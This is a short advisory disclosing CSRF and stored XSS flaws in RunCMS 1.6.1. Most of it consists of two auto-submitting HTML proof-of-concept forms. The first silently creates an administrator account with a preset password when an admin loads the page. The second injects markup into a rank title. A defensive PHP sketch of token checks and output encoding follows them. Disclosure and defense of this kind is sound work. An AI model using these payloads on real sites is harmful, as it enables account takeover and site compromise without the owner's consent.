###################################################################
RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilities
by NBBN
###################################################################

[b]1) Create Webmaster (admin) XSRF Vulnerability[/b]

<html><head></head><body onLoad="javascript:document.attack.submit()">
<form action="http://localhost/xampp/runcms/modules/system/admin.php" method="post" enctype="multipart/form-data" name="r">
<input type="hidden" name="uname" value="Attacker">
<input type="hidden" name="name" value="Attacker">
<input type="hidden" name="email" value="attack@xxxxxxxxxx">
<input type="hidden" name="url" value="">
<input type="hidden" name="user_avatar" value="blank.gif">
<input type="hidden" name="theme" value="helloween">
<input type="hidden" name="timezone_offset" value="0">
<input type="hidden" name="language" value="deutsch">
<input type="hidden" name="user_icq" value="">
<input type="hidden" name="user_aim" value="">
<input type="hidden" name="user_msnm" value="">
<input type="hidden" name="user_from" value="">
<input type="hidden" name="user_occ" value="">
<input type="hidden" name="user_intrest" value="">
<input type="hidden" name="user_birth%5b2%5D" value="">
<input type="hidden" name="user_birth%5B1%5D" value="">
<input type="hidden" name="user_birth%5BO%5D" value="">
<input type="hidden" name="user_sig" value="">
<input type="hidden" name="umode" value="flat">
<input type="hidden" name="uorder" value="1">
<input type="hidden" name="bio" value="">
<input type="hidden" name="rank" value="7">
<input type="hidden" name="pass" value="Password">
<input type="hidden" name="pass2" value="Password">
<input type="hidden" name="fct" value="users">
<input type="hidden" name="op" value="addUser">
<input type="hidden" name="submit" value="%DCbernehmen">

With XSRF an attacker can also update the profile of all users. He can change the password etc.

[b]2) Cross-Site Scripting (an attacker can only attack an admin)[/b]

<html><head></head><body onLoad="javascript:document.r.submit()">
<form action="http://localhost/xampp/runcms/modules/system/admin.php" method="post" enctype="multipart/form-data" name="r">
<input type="text" class="text" name="rank_title" size="30" maxlength="50" value="<marquee>Cross-Site Scritping :-("/>
<input type="hidden" name="fct" value="userrank">
<input type="hidden" name="op" value="RankForumAdd">
</form>
</body>
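
A defensive sketch of the two controls whose absence both items rely on, added here as an example and not taken from RunCMS or from the advisory: a per-session token check on state-changing admin.php requests, and HTML encoding of rank_title on output. The function names, the csrf_token field and the $session array (a stand-in for $_SESSION) are assumptions.

```php
<?php
declare(strict_types=1);

// Issue a per-session anti-CSRF token (hypothetical helper; $session stands in for $_SESSION).
function csrf_issue(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Accept a state-changing admin request only if it is a POST carrying the session's token.
function csrf_check(array $session, string $method, array $post): bool
{
    if ($method !== 'POST') {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // hash_equals compares in constant time; an empty or missing token never matches.
    return is_string($supplied) && $expected !== ''
        && hash_equals($expected, $supplied);
}

// Encode stored values such as rank_title before echoing them into admin HTML.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample data: a logged-in admin session and two addUser requests.
$session = [];
$token   = csrf_issue($session);

$crossSite = ['fct' => 'users', 'op' => 'addUser', 'uname' => 'Attacker', 'rank' => '7'];
$sameSite  = $crossSite + ['csrf_token' => $token];

var_dump(csrf_check($session, 'POST', $crossSite)); // cross-site form cannot know the token
var_dump(csrf_check($session, 'POST', $sameSite));  // form rendered by the admin panel itself

// Constructed rank title containing markup, as in item 2.
echo h('<marquee>Cross-Site Scripting'), PHP_EOL;
```

The token check has to run before the fct/op dispatch in admin.php, and the encoding has to be applied wherever a stored rank title is written into a page.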